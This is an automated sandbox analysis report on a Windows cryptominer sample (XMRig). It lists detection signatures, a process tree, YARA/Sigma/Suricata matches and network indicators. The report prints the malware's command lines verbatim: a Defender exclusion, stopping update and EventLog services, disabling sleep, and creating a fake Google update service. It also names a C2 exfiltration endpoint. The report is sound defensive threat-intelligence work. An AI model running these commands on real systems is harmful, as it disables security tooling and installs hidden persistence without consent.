Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1549199
MD5:73a56908097ee57dd4217877aeae4641
SHA1:a41cc3570f40f9688b2ac9f5e7326150a3a350a6
SHA256:fde56e00761a85ad495bd2d05654f3657922f665f58edfabcf43d2fa769f0d79
Tags:exeuser-Bitsight
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 73A56908097EE57DD4217877AEAE4641)
    • powershell.exe (PID: 7660 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7972 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7900 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7996 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8036 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8080 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8128 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8176 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8184 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7180 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7224 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7296 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 584 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7392 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5556 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3920 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 352 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 3760 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 73A56908097EE57DD4217877AEAE4641)
    • powershell.exe (PID: 7440 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7688 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7820 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7984 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7988 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7996 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8052 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8124 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8104 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8116 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8140 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7176 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1028 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1036 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 5948 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 5568 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000041.00000003.2002764308.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000041.00000003.1931884309.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000041.00000002.2575912282.000001E2F6861000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37eb98:$a1: mining.set_target
          • 0x370e20:$a2: XMRIG_HOSTNAME
          • 0x373748:$a3: Usage: xmrig [OPTIONS]
          • 0x370df8:$a4: XMRIG_VERSION

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          65.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            65.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x37ef98:$a1: mining.set_target
            • 0x371220:$a2: XMRIG_HOSTNAME
            • 0x373b48:$a3: Usage: xmrig [OPTIONS]
            • 0x3711f8:$a4: XMRIG_VERSION
            65.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
            • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
            65.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
            • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
            • 0x3cd180:$s3: \\.\WinRing0_
            • 0x376148:$s4: pool_wallet
            • 0x3705f0:$s5: cryptonight
            • 0x370600:$s5: cryptonight
            • 0x370610:$s5: cryptonight
            • 0x370620:$s5: cryptonight
            • 0x370638:$s5: cryptonight
            • 0x370648:$s5: cryptonight
            • 0x370658:$s5: cryptonight
            • 0x370670:$s5: cryptonight
            • 0x370680:$s5: cryptonight
            • 0x370698:$s5: cryptonight
            • 0x3706b0:$s5: cryptonight
            • 0x3706c0:$s5: cryptonight
            • 0x3706d0:$s5: cryptonight
            • 0x3706e0:$s5: cryptonight
            • 0x3706f8:$s5: cryptonight
            • 0x370710:$s5: cryptonight
            • 0x370720:$s5: cryptonight
            • 0x370730:$s5: cryptonight

            Sigma Signatures

            Change of critical system settings

            barindex
            Sigma detected: Disable power options
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 8176, ProcessName: powercfg.exe

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7660, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7660, ProcessName: powershell.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7296, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
            Sigma detected: New Service Creation Using Sc.EXE
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 5556, ProcessName: sc.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7660, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Stop EventLog
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3920, ProcessName: sc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T12:24:41.243644+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949794TCP
            2024-11-05T12:25:18.678723+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949976TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T12:24:36.141321+010020446971A Network Trojan was detected192.168.2.949768162.230.48.18980TCP
            2024-11-05T12:25:35.977063+010020446971A Network Trojan was detected192.168.2.949984162.230.48.18980TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 55%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Bitcoin Miner

            barindex
            Yara detected Xmrig cryptocurrency miner
            Source: Yara matchFile source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000041.00000003.2002764308.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000003.1931884309.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000002.2575912282.000001E2F6861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
            Found strings related to Crypto-Mining
            Source: dialer.exeString found in binary or memory: cryptonight-monerov7
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE0 FindFirstFileExW,31_2_000001F385BCDCE0
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199DCE0 FindFirstFileExW,34_2_000002A29199DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE0 FindFirstFileExW,40_2_0000014E25EDDCE0
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F4DCE0 FindFirstFileExW,41_2_00000283E0F4DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539CDCE0 FindFirstFileExW,66_2_000001FB539CDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BDDCE0 FindFirstFileExW,67_2_000001CBD8BDDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD16DCE0 FindFirstFileExW,68_2_000001F2BD16DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BADCE0 FindFirstFileExW,69_2_00000229F8BADCE0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.9:49768 -> 162.230.48.189:80
            Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.9:49984 -> 162.230.48.189:80
            Source: global trafficTCP traffic: 192.168.2.9:49762 -> 149.102.143.109:20128
            Source: Joe Sandbox ViewIP Address: 149.102.143.109 149.102.143.109
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49976
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49794
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownTCP traffic detected without corresponding DNS query: 162.230.48.189
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: gulf.moneroocean.stream
            Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 283Content-Type: application/jsonHost: 162.230.48.189User-Agent: cpp-httplib/0.12.6
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lsass.exe, 00000022.00000002.2578503702.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
